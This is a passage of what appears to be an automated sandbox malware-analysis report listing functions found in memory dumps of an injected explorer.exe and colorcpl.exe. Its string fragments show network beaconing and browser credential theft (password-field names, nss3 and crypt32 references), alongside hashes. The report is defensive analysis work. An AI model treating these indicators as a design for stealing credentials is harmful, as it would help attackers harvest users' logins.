Instruction Fuzzy Hash: CD812A71D402799BDB319B54CC44BEAF7B8AF48714F1441EAEA09B7241E7709E85CFA0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exePID: 1028, Parent PID: 2136COMMON

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.6%
Total number of Nodes:	102
Total number of Limit Nodes:	7

Executed Functions

Function 103F1302 Relevance: 23.7, APIs: 3, Strings: 10, Instructions: 911
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32 ref: 103F14AE
setsockopt.WS2_32 ref: 103F1CB2
recv.WS2_32 ref: 103F1CDA

Strings

ose, xrefs: 103F1746
: cl, xrefs: 103F173E
Co, xrefs: 103F1726
nnec, xrefs: 103F172E
dat=, xrefs: 103F16A4
tion, xrefs: 103F1736
=, xrefs: 103F18D0
&un=, xrefs: 103F1948
&br=, xrefs: 103F1979
GET , xrefs: 103F1768

Memory Dump Source

Source File: 00000003.00000002.4456583793.00000000103B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 103B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_103b0000_explorer.jbxd

Yara matches

Similarity

API ID: getaddrinforecvsetsockopt
String ID: Co$&br=$&un=$: cl$=$GET $dat=$nnec$ose$tion
API String ID: 1564272048-2976227712
Opcode ID: b31e8b864956b6b4abfa9b859ad4291af29cc5130ca763e476aa0a2d5a1583bf
Instruction ID: 4fbac7e519e2ecd4cc5e493bc1138fc347c78d2b484ce0c053a49ba5d96b7601
Opcode Fuzzy Hash: b31e8b864956b6b4abfa9b859ad4291af29cc5130ca763e476aa0a2d5a1583bf
Instruction Fuzzy Hash: 80629234618B4C8BC759DF68D485BEAB7E1FB95300F514A2EE49BC7242EF30A845CB46

Uniqueness

Uniqueness Score: -1.00%

Function 103ECB72 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 103ECC50

Strings

nt: , xrefs: 103ECBCE
on.d, xrefs: 103ECBB2
urlm, xrefs: 103ECBAB
User, xrefs: 103ECBC0
-Age, xrefs: 103ECBC7
User-Agent: , xrefs: 103ECBE5, 103ECBF8
urlmon.dll, xrefs: 103ECC09

Memory Dump Source

Source File: 00000003.00000002.4456583793.00000000103B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 103B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_103b0000_explorer.jbxd

Yara matches

Similarity

API ID: AgentObtainStringUser
String ID: -Age$User$User-Agent: $nt: $on.d$urlm$urlmon.dll
API String ID: 2681117516-2989374884
Opcode ID: 752dc51a817f6f790f337929eeea8fa61c4a69b4e280c3bb0a64550d2a7672f7
Instruction ID: b71ba8c7f9f0e15df9b837d6ea339c1be535dcd80b9fcd034d2cc22e16c1fdbf
Opcode Fuzzy Hash: 752dc51a817f6f790f337929eeea8fa61c4a69b4e280c3bb0a64550d2a7672f7
Instruction Fuzzy Hash: 8731D175614A0C8BCB44EFA8C8853EEB7E1FB68205F40422AE45EDB340DE789645879A

Uniqueness

Uniqueness Score: -1.00%

Function 103ECB69 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 103ECC50

Strings

nt: , xrefs: 103ECBCE
on.d, xrefs: 103ECBB2
urlm, xrefs: 103ECBAB
User, xrefs: 103ECBC0
-Age, xrefs: 103ECBC7
User-Agent: , xrefs: 103ECBE5, 103ECBF8
urlmon.dll, xrefs: 103ECC09

Memory Dump Source

Source File: 00000003.00000002.4456583793.00000000103B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 103B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_103b0000_explorer.jbxd

Yara matches

Similarity

API ID: AgentObtainStringUser
String ID: -Age$User$User-Agent: $nt: $on.d$urlm$urlmon.dll
API String ID: 2681117516-2989374884
Opcode ID: f215ae1b6986ab9f8d555c9cdb9d4b5ebcf65807cd436e19b72061a99f7b7c42
Instruction ID: 9a223101c1edb6aa909ba461ac29c211abd1fefd182c60c80a35293afbe2001e
Opcode Fuzzy Hash: f215ae1b6986ab9f8d555c9cdb9d4b5ebcf65807cd436e19b72061a99f7b7c42
Instruction Fuzzy Hash: B4310670614A4C8BCB05DFA8C8453EDB7E1FF68204F40432AE45ADB341DF789645C79A

Uniqueness

Uniqueness Score: -1.00%

Function 103EDE7E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 103EDEE1

Strings

ect, xrefs: 103EDEB1
conn, xrefs: 103EDEAA

Memory Dump Source

Source File: 00000003.00000002.4456583793.00000000103B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 103B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_103b0000_explorer.jbxd

Yara matches

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: fb95bafb82b3473d6ef4390d0af350634b81bde5baa335949624609cad2727e7
Instruction ID: 860136efcba681daf2a541aeefeda8e62f81fe8e02f4e9cd19ac5e861e4b7022
Opcode Fuzzy Hash: fb95bafb82b3473d6ef4390d0af350634b81bde5baa335949624609cad2727e7
Instruction Fuzzy Hash: 40011E70618A488FDB84EF5CE088B15BBE0EB59314F1546AEA90DCB267CA74C8858B85

Uniqueness

Uniqueness Score: -1.00%

Function 103EDE82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 103EDEE1

Strings

ect, xrefs: 103EDEB1
conn, xrefs: 103EDEAA

Memory Dump Source

Source File: 00000003.00000002.4456583793.00000000103B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 103B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_103b0000_explorer.jbxd

Yara matches

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: 26898fd5f90645f94afd46a3ac35e2686c27f416d54a17c3d9a13a012a848fc3
Instruction ID: cc1d49e0298226bbbedb7cf3c1a68ccd5bda33e670161b3c7faccf80ad4a8aca
Opcode Fuzzy Hash: 26898fd5f90645f94afd46a3ac35e2686c27f416d54a17c3d9a13a012a848fc3
Instruction Fuzzy Hash: A9012170618A088FDB84EF5CE088B15B7E0EB58314F1542AEA80DCB227CA70C8818B81

Uniqueness

Uniqueness Score: -1.00%

Function 103EDDF7 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32 ref: 103EDE63

Strings

send, xrefs: 103EDE2A

Memory Dump Source

Source File: 00000003.00000002.4456583793.00000000103B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 103B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_103b0000_explorer.jbxd

Yara matches

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: 06a0e18ca9c1e1e84b1de7ba9482a901a96b4c92f796fb4ce4398a9b5ac61c15
Instruction ID: b224ad63463fbf5222a06927aa4aa699cc060a915f0a6327728cb1116d03be09
Opcode Fuzzy Hash: 06a0e18ca9c1e1e84b1de7ba9482a901a96b4c92f796fb4ce4398a9b5ac61c15
Instruction Fuzzy Hash: 9501E170518A588FDB84EF5CE089B15B7E0EB98724F1545AEA84DCB266CB70D881CB82

Uniqueness

Uniqueness Score: -1.00%

Function 103EDE02 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32 ref: 103EDE63

Strings

send, xrefs: 103EDE2A

Memory Dump Source

Source File: 00000003.00000002.4456583793.00000000103B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 103B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_103b0000_explorer.jbxd

Yara matches

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: 3773d62206420a3ed138edb7b0d1187259b6e4662953c22d04494397483c12ef
Instruction ID: ef2fd70aef7d8d1b6a8e4cc9a95e02c6e7cd90821773b9c27a3ba3bf67b27477
Opcode Fuzzy Hash: 3773d62206420a3ed138edb7b0d1187259b6e4662953c22d04494397483c12ef
Instruction Fuzzy Hash: 8601C070618A588FDB84EF5CE489B15B7E0EB5C315F1545AEA84DCB266CB70D881CB81

Uniqueness

Uniqueness Score: -1.00%

Function 103EDD02 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32 ref: 103EDD61

Strings

sock, xrefs: 103EDD29

Memory Dump Source

Source File: 00000003.00000002.4456583793.00000000103B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 103B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_103b0000_explorer.jbxd

Yara matches

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: 324350153747078c09b6e059cc1e16611ed0418a95caa11cf7f7e91404692acf
Instruction ID: c39d7ae64eaab359f79189d3280dca705b38468a14ecfbba10dc4e6dcd867c15
Opcode Fuzzy Hash: 324350153747078c09b6e059cc1e16611ed0418a95caa11cf7f7e91404692acf
Instruction Fuzzy Hash: 78012C70658A588FDB84EF1CE048B15BBE0FB98314F1642AEE84DCB366C770D9418B86

Uniqueness

Uniqueness Score: -1.00%

Function 103E9272 Relevance: 1.6, APIs: 1, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 103E92BD

Memory Dump Source

Source File: 00000003.00000002.4456583793.00000000103B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 103B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_103b0000_explorer.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: fd57b9079238b9e4bf1c504420f21d1e9a897069bc43c21d39ffc44af76478d5
Instruction ID: 1c2fb9b5eeffa1ec0ac83f636899a9e41aa6e9896f632eddcb611b0c776591ef
Opcode Fuzzy Hash: fd57b9079238b9e4bf1c504420f21d1e9a897069bc43c21d39ffc44af76478d5
Instruction Fuzzy Hash: E1213D34614B5D9FDF94EF5A80D42AAB3E2FB94300F450B7F9A1DCB246DB70A8418B91

Uniqueness

Uniqueness Score: -1.00%

Function 103E9372 Relevance: 1.5, APIs: 1, Instructions: 46
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32 ref: 103E93C1

Memory Dump Source

Source File: 00000003.00000002.4456583793.00000000103B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 103B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_103b0000_explorer.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: cfb251b7fb65ae1a18f5ac1e17752e3c91e37e30979649d55e8a6c003a8ca0b1
Instruction ID: 2bba8d0f29e85901a687f5e8f68aa4ba796c8af23c5dcc062b7f39e7baf49dcf
Opcode Fuzzy Hash: cfb251b7fb65ae1a18f5ac1e17752e3c91e37e30979649d55e8a6c003a8ca0b1
Instruction Fuzzy Hash: 59F0F634228A4D4FD788EF2CD84562AF3D0EBE8204F41463FA94DC7364DE79D9818716

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 10976362 Relevance: 10.4, Strings: 8, Instructions: 415COMMON

Download Yara Rule

Strings

user, xrefs: 10976563
S, xrefs: 109766A3
M, xrefs: 109766B2
kern, xrefs: 109765A2
.dll, xrefs: 1097658F
ll, xrefs: 10976573
el32, xrefs: 10976587
32.d, xrefs: 1097656B

Memory Dump Source

Source File: 00000003.00000002.4456692490.00000000108B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 108B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_108b0000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: .dll$32.d$M$S$el32$kern$ll$user
API String ID: 0-2502794028
Opcode ID: c5db7e793f41bd8d0a0f920318c67521dc068e2db041c474da1b73f17c19a18e
Instruction ID: 0c6a78b77b6bcc939acd4ab55f5691a12431d312cc31f714e9c27ea5bb69010b
Opcode Fuzzy Hash: c5db7e793f41bd8d0a0f920318c67521dc068e2db041c474da1b73f17c19a18e
Instruction Fuzzy Hash: C9E16A75618F488FC7A5DF68C4957ABB7E1FB98301F408A2EA09FC7241DF34A5018B86

Uniqueness

Uniqueness Score: -1.00%

Function 10977F62 Relevance: 21.6, Strings: 17, Instructions: 321
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

swor, xrefs: 109780BA
encr, xrefs: 109780A2
e, xrefs: 1097808D
d, xrefs: 109780C2
encr, xrefs: 1097806D
guid, xrefs: 10977F9E
ypte, xrefs: 10978075
form, xrefs: 1097801D
rnam, xrefs: 10978085
name, xrefs: 1097804D
dUse, xrefs: 1097807D
itUR, xrefs: 1097802D
Fiel, xrefs: 10978054
dPas, xrefs: 109780B2
ypte, xrefs: 109780AA
user, xrefs: 10978046
Subm, xrefs: 10978025

Memory Dump Source

Source File: 00000003.00000002.4456692490.00000000108B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 108B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_108b0000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
API String ID: 0-2916316912
Opcode ID: 56afb66bc7800efa7095bb22cd0bf75f3d5e60f3fa8c3a89c278dcda83de6e57
Instruction ID: 17b60d79cb4a9ea0cd1239ba0b91d8883bdb76f3fc8996ab9fd224efd804ca56
Opcode Fuzzy Hash: 56afb66bc7800efa7095bb22cd0bf75f3d5e60f3fa8c3a89c278dcda83de6e57
Instruction Fuzzy Hash: 89B19B35618B488FDB55EF68C495AEEB7F1FF98300F40851EE49AC7261EF30A5058B86

Uniqueness

Uniqueness Score: -1.00%

Function 1097C152 Relevance: 17.8, Strings: 14, Instructions: 277COMMON

Download Yara Rule

Strings

[, xrefs: 1097C2CD
c, xrefs: 1097C2AB
e, xrefs: 1097C340
], xrefs: 1097C34B
[, xrefs: 1097C306
D, xrefs: 1097C375
l, xrefs: 1097C382
[, xrefs: 1097C330
l, xrefs: 1097C2D5
n, xrefs: 1097C338
], xrefs: 1097C2DD
[, xrefs: 1097C36D
b, xrefs: 1097C313
[, xrefs: 1097C296

Memory Dump Source

Source File: 00000003.00000002.4456692490.00000000108B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 108B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_108b0000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
API String ID: 0-355182820
Opcode ID: a6a4f954d7e1a1d6677c0a196a77deb741e60ff8985d6ebf53001fdeb0404501
Instruction ID: 9d03c88dd85293a74ed0b49305440f6ccb6f9e24633aef619686043e9287ced1
Opcode Fuzzy Hash: a6a4f954d7e1a1d6677c0a196a77deb741e60ff8985d6ebf53001fdeb0404501
Instruction Fuzzy Hash: 42A19AB6218B498FC759DF24C8957AAF3E5FB98304F40872EA59EC7210DF30A515CB86

Uniqueness

Uniqueness Score: -1.00%

Function 109773FD Relevance: 14.1, Strings: 11, Instructions: 332COMMON

Download Yara Rule

Strings

9, xrefs: 109775B6
7, xrefs: 10977582
3, xrefs: 1097751A
1, xrefs: 109774E6
5, xrefs: 1097754E
2, xrefs: 10977500
0, xrefs: 109774CC
8, xrefs: 1097759C
4, xrefs: 10977534
6, xrefs: 10977568
, xrefs: 109775D0

Memory Dump Source

Source File: 00000003.00000002.4456692490.00000000108B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 108B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_108b0000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: $0$1$2$3$4$5$6$7$8$9
API String ID: 0-2769784006
Opcode ID: d1e04571e4bfdd776a2ad7215899e0580d29976e814df35a3d2ac0ab4e2c4785
Instruction ID: 88dc922585137859e3e2f8de615229f78fc2be25e01aa39dd9441081132dc5ae
Opcode Fuzzy Hash: d1e04571e4bfdd776a2ad7215899e0580d29976e814df35a3d2ac0ab4e2c4785
Instruction Fuzzy Hash: 64B18C7AA24B8696E71A9F68C0A839CF798FF04385F20952FD8C547350D37A6851CBD3

Uniqueness

Uniqueness Score: -1.00%

Function 109784B2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

L: , xrefs: 10978536
Pass, xrefs: 10978567
word, xrefs: 1097856E
User, xrefs: 1097857B
2, xrefs: 109785B1
UR, xrefs: 1097852F
name, xrefs: 10978582

Memory Dump Source

Source File: 00000003.00000002.4456692490.00000000108B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 108B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_108b0000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 1bcfa39f7bef75af0ab4313e4033112f65a176de69dc3b459345197c787de5de
Instruction ID: 6ed4a47603971503dfacbbf11648204849c3130bc21d23a17cdf4d5a213c8011
Opcode Fuzzy Hash: 1bcfa39f7bef75af0ab4313e4033112f65a176de69dc3b459345197c787de5de
Instruction Fuzzy Hash: 6F91AE71A187488FDB19DFA8D4547EEB7E1FF88300F40862EE48AD7251EF7095468B89

Uniqueness

Uniqueness Score: -1.00%

Function 10978B72 Relevance: 8.8, Strings: 7, Instructions: 100COMMON

Download Yara Rule

Strings

urlm, xrefs: 10978BAB
on.d, xrefs: 10978BB2
-Age, xrefs: 10978BC7
User-Agent: , xrefs: 10978BE5, 10978BF8
nt: , xrefs: 10978BCE
urlmon.dll, xrefs: 10978C09
User, xrefs: 10978BC0

Memory Dump Source

Source File: 00000003.00000002.4456692490.00000000108B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 108B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_108b0000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: -Age$User$User-Agent: $nt: $on.d$urlm$urlmon.dll
API String ID: 0-2989374884
Opcode ID: 752dc51a817f6f790f337929eeea8fa61c4a69b4e280c3bb0a64550d2a7672f7
Instruction ID: ac162f739ced9ffa47f3a22c644e6e2cb65fb8252e01b30dac88e66bdf51ee0f
Opcode Fuzzy Hash: 752dc51a817f6f790f337929eeea8fa61c4a69b4e280c3bb0a64550d2a7672f7
Instruction Fuzzy Hash: 3531F432714A4C8FCB01EFA8C8953EEB7E1FB58205F40422EE45ED7240EE7496448B85

Uniqueness

Uniqueness Score: -1.00%

Function 10978B69 Relevance: 8.8, Strings: 7, Instructions: 94COMMON

Download Yara Rule

Strings

urlm, xrefs: 10978BAB
on.d, xrefs: 10978BB2
-Age, xrefs: 10978BC7
User-Agent: , xrefs: 10978BE5, 10978BF8
nt: , xrefs: 10978BCE
urlmon.dll, xrefs: 10978C09
User, xrefs: 10978BC0

Memory Dump Source

Source File: 00000003.00000002.4456692490.00000000108B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 108B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_108b0000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: -Age$User$User-Agent: $nt: $on.d$urlm$urlmon.dll
API String ID: 0-2989374884
Opcode ID: f215ae1b6986ab9f8d555c9cdb9d4b5ebcf65807cd436e19b72061a99f7b7c42
Instruction ID: 0aeb418c859edc7b946d2cd81761dfcf695f1ffa35ff62dd66ba882d1e46e1bd
Opcode Fuzzy Hash: f215ae1b6986ab9f8d555c9cdb9d4b5ebcf65807cd436e19b72061a99f7b7c42
Instruction Fuzzy Hash: 59312532614A4C8BCB05DFA8C8953EE77E1FF58205F40822EE45AD7240DF749645CB89

Uniqueness

Uniqueness Score: -1.00%

Function 10978810 Relevance: 7.7, Strings: 6, Instructions: 203COMMON

Download Yara Rule

Strings

+Q0$, xrefs: 109789E4
t32., xrefs: 109789BC
cryp, xrefs: 109789B5
nss3, xrefs: 10978908
dll, xrefs: 109789C3
.dll, xrefs: 1097890F

Memory Dump Source

Source File: 00000003.00000002.4456692490.00000000108B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 108B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_108b0000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: +Q0$$.dll$cryp$dll$nss3$t32.
API String ID: 0-4170858970
Opcode ID: 4d78eaddf6fb1a828fc06bbe53a376cdcb411a43974272014c8cf34b767ead13
Instruction ID: 09395bae2db13a4cad385331d99d172b955ed31411872c48668b7ec672156d0c
Opcode Fuzzy Hash: 4d78eaddf6fb1a828fc06bbe53a376cdcb411a43974272014c8cf34b767ead13
Instruction Fuzzy Hash: BD616C71A18B0A9FDB59DF68C0557DAB3E1FF18300F40862EA44ACB294EB74E954CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 10978812 Relevance: 7.7, Strings: 6, Instructions: 199COMMON

Download Yara Rule

Strings

+Q0$, xrefs: 109789E4
t32., xrefs: 109789BC
cryp, xrefs: 109789B5
nss3, xrefs: 10978908
dll, xrefs: 109789C3
.dll, xrefs: 1097890F

Memory Dump Source

Source File: 00000003.00000002.4456692490.00000000108B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 108B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_108b0000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: +Q0$$.dll$cryp$dll$nss3$t32.
API String ID: 0-4170858970
Opcode ID: 1793b91f6e39105acd708896bf146476095b08804c27c17c0b7362797f78f518
Instruction ID: 6827e3c96ce8af1bfa9be0c9dfd42a18cb4544134b4352041190db7dbb9f2799
Opcode Fuzzy Hash: 1793b91f6e39105acd708896bf146476095b08804c27c17c0b7362797f78f518
Instruction Fuzzy Hash: 8E613B71A18B0A9FDB59DF68C0557DAB3E1FF18300F40862EA84ACB294DB74E954CB85

Uniqueness

Uniqueness Score: -1.00%

Function 10976CA2 Relevance: 7.7, Strings: 6, Instructions: 164COMMON

Download Yara Rule

Strings

b, xrefs: 10976D58
U, xrefs: 10976DBE
d, xrefs: 10976D68
k, xrefs: 10976DC5
o, xrefs: 10976DCC
n, xrefs: 10976DD3

Memory Dump Source

Source File: 00000003.00000002.4456692490.00000000108B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 108B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_108b0000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: U$b$d$k$n$o
API String ID: 0-1739295752
Opcode ID: 6501b7d58d2207a0f6227a4dffa43edd2e2b39fbd553dec8a1538c2e1ec7b005
Instruction ID: 45b65f3ff600b4962f33b44bb66378a3384d7e5a00f278903513fab53d32ed30
Opcode Fuzzy Hash: 6501b7d58d2207a0f6227a4dffa43edd2e2b39fbd553dec8a1538c2e1ec7b005
Instruction Fuzzy Hash: 84519035A14A0D8BCB19EFA4C8957DEB3B5FF58300F40862ED41AD7240EF74AA198BC5

Uniqueness

Uniqueness Score: -1.00%

Function 10977B22 Relevance: 6.5, Strings: 5, Instructions: 235COMMON

Download Yara Rule

Strings

, xrefs: 10977C50
., xrefs: 10977BB4
e, xrefs: 10977C62
v, xrefs: 10977C74
n, xrefs: 10977BC3

Memory Dump Source

Source File: 00000003.00000002.4456692490.00000000108B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 108B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_108b0000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: $.$e$n$v
API String ID: 0-1849617553
Opcode ID: 95e153721a8243176bdcfc4ec0bba6682096c3affc1884d34ce9e03ac5a5956d
Instruction ID: 9d6dc0e13ec9d37b89d12aafff7a7d2080153c62a1a7f022d6a034e4428ff284
Opcode Fuzzy Hash: 95e153721a8243176bdcfc4ec0bba6682096c3affc1884d34ce9e03ac5a5956d
Instruction Fuzzy Hash: 0271B135A18B498FD758DF68C4957AEB7F1FF98300F00452EE44AC7261EF70A9458B86

Uniqueness

Uniqueness Score: -1.00%

Function 109754B2 Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

dll, xrefs: 1097551E
shel, xrefs: 10975510
2.dl, xrefs: 109754E4
l32., xrefs: 10975517
ole3, xrefs: 109754DD

Memory Dump Source

Source File: 00000003.00000002.4456692490.00000000108B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 108B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_108b0000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: 7f0a57f1a18a152b67e891e746c5d0ba14f1bd9ec17d373cf41b375470a058b5
Instruction ID: 2104b07ededb62a7f5b09418ca9288284881537299e1413b457220272677a477
Opcode Fuzzy Hash: 7f0a57f1a18a152b67e891e746c5d0ba14f1bd9ec17d373cf41b375470a058b5
Instruction Fuzzy Hash: 1A515BB1918B4C8BDB65DFA4C0457DEB7E1FF58301F408A2EA49AE7214EF30A5418B89

Uniqueness

Uniqueness Score: -1.00%

Function 109754B1 Relevance: 6.4, Strings: 5, Instructions: 173COMMON

Download Yara Rule

Strings

dll, xrefs: 1097551E
shel, xrefs: 10975510
2.dl, xrefs: 109754E4
l32., xrefs: 10975517
ole3, xrefs: 109754DD

Memory Dump Source

Source File: 00000003.00000002.4456692490.00000000108B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 108B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_108b0000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: a2c11254b6804c24ff5fb9edd612978221c5760a26344c3e28e6914a37c77dfb
Instruction ID: 87f8321b92d50f733ceb48aaf25e01fbf9a99a02b8d3247a32efbbfe2a798f9c
Opcode Fuzzy Hash: a2c11254b6804c24ff5fb9edd612978221c5760a26344c3e28e6914a37c77dfb
Instruction Fuzzy Hash: 71516CB1918B4C8BDB65DFA4C0457DEB7F1FF58301F408A2EA49AE7254EF30A5418B89

Uniqueness

Uniqueness Score: -1.00%

Function 10975CB2 Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

h, xrefs: 10975DA4
kern, xrefs: 10975DAF
.dll, xrefs: 10975DBF
el32, xrefs: 10975DB7

Memory Dump Source

Source File: 00000003.00000002.4456692490.00000000108B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 108B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_108b0000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: 1554096f39610354e9bf71ae9ccfcdef4f33edfc538b8a70ef8d9d967b113218
Instruction ID: d649314f9e7644c181ec828ed5d2cbafa1afd0a0a63b2ccdf9cec87db23aab06
Opcode Fuzzy Hash: 1554096f39610354e9bf71ae9ccfcdef4f33edfc538b8a70ef8d9d967b113218
Instruction Fuzzy Hash: 2A418171A08B8D8FD799DF6884983AAB7E1FF98300F108A2F949EC3255DB70D945CB41

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: colorcpl.exePID: 3716, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	1.7%
Dynamic/Decrypted Code Coverage:	2.1%
Signature Coverage:	0%
Total number of Nodes:	702
Total number of Limit Nodes:	82

Executed Functions

Function 02E381AB Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02E33B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02E33B87,007A002E,00000000,00000060,00000000,00000000), ref: 02E381FD

Strings

.z`, xrefs: 02E381ED, 02E381F8

Memory Dump Source

Source File: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e20000_colorcpl.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 811f07646c908134e56c7874a94f0c3218f99055387076d7a4350d88b338be02
Instruction ID: 1072987d52998bf338601275a2ab6559beeaf60c82fcc8eeb616af8797a77b87
Opcode Fuzzy Hash: 811f07646c908134e56c7874a94f0c3218f99055387076d7a4350d88b338be02
Instruction Fuzzy Hash: 0301B2B2605109AFCB48CF88DC94EEB77A9AF8C354F158258FA0D97240C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02E381B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

